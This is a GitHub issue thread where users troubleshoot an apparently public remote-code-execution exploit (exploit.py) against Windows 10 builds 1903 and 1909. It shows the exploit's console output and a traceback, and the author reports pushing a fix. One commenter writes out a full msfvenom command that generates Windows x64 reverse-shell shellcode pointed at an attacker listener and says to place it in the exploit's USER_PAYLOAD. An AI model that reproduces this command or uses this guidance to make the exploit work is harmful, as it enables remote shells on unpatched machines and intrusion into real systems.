895515845
commented
4 years ago I have this problem,so what should I do
Closed 0xFF1E071F closed 4 years ago
895515845
commented
4 years ago I have this problem,so what should I do
0xFF1E071F
commented
4 years ago I have this problem,so what should I do
Unfortunately i couldn't find a solution yet :/
chompie1337
commented
4 years ago nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly
chompie1337
commented
4 years ago fix for this error has been pushed
0xFF1E071F
commented
4 years ago Thank you i have another error now:
python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
File "exploit.py", line 465, in <module>
do_rce(args.ip, args.port)
File "exploit.py", line 428, in do_rce
search_hal_heap(ip, port)
File "exploit.py", line 356, in search_hal_heap
PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes
OK ppl, if you are reading this dont forget to
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python and change the USER_PAYLOAD with this shellcode.This code now works on b1903.
And i cannot make it exploit on 1909 machines.
0xFF1E071F
commented
4 years ago Ok, when i use the exploit on b1909 machines, python code works normally (i mean no error output). But the b1909 machine crashes and reboots.
0xFF1E071F
commented
4 years ago now works on 1909 thanks
I am using py3.8 host machine linux target machine win10 b 1903
they are on the same virtual network
I got this error when i am trying to run exploit.py
edit:fix right error